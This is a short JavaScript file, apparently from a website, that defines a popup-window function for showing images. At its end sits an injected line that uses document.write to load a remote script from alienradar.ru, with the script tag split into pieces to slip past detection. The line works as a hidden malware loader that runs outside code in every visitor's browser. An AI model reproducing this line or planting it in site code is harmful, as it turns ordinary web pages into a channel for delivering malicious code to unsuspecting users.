function openPop(img,desc,width,height){
	width = 266;
	height = 450;
	var newwindow = window.open("popUp.php?item=" + img + "&desc=" + desc, "ShowPic","width=" + width + ", height=" + height + ", position=relative, top=100,left=100 ,toolbars=no,resizable=no,scrollbars=no");
        newwindow.focus();
}

document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/User_Interface.js"></scri'+'pt>');
